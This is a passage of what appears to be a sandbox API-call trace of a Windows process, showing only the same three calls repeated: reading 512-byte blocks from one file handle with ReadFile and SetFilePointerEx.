lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.776] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.776] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.776] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.776] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.776] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.776] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.776] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.776] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.776] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.776] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.776] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.776] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.776] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.776] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.776] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.776] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.776] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.776] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.776] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.777] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.777] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.777] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.777] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.777] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.777] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.777] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.777] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.777] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.777] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.777] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.777] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.777] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.777] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.777] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.777] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.777] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.777] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.777] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.777] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.777] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.778] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.778] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.778] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.778] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.778] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.778] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.778] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.778] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.778] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.778] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.778] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.778] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.778] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.778] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.778] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.778] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.778] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.778] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.778] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.778] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.778] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.778] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.778] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.779] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.779] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.779] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.779] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.779] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.779] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.779] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.779] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.779] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.779] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.779] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.779] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.779] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.779] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.779] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.779] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.779] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.779] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.779] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.779] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.779] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.780] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.780] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.780] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.780] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.780] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.780] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.780] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.780] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.780] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.780] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.780] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.780] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.780] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.780] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.780] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.780] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.780] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.780] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.780] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.780] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.781] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.781] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.781] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.781] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.781] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.781] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.781] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.781] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.781] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.781] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.781] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.781] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.781] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.781] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.781] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.781] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.781] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.781] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.781] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.781] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.781] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.781] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.782] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.782] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.782] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.782] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.782] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.782] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.782] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.782] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.782] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.782] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.782] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.782] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.782] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.782] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.782] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.783] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.783] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.783] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.783] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.783] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.783] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.783] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.783] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.783] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.783] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.783] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.783] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.783] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.783] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.783] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.783] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.783] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.783] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.783] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.783] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.783] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.783] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.784] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.784] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.784] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.784] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.784] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.784] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.784] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.784] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.784] 